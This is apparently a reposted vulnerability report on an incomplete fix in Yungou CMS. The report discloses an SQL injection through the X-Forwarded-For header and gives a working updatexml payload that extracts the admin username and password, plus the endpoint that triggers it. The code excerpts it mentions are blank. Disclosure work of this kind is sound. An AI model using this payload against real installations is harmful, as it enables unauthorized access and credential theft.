云购Cms修复不当仍存在Sql注入

文章目录

漏洞作者:

浅蓝

详细说明:

根据雨牛的 WooYun: Yungoucms Sql Injection 第一枚

我看了下相同位置的代码


 

 

再看看 _get_ip()函数

/*获取客户端ip*/


 

把xff改为 1.1.1.1’or updatexml(1,concat(0x5e24,(select concat(username,0x23,userpass) from go_admin limit 0,1),0x5e24),1) or’

登录后打开 http://localhost/yungou/?/vote/vote/checked_option

01193455dde74f10d1c22130de738550843b5bc3[1]

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录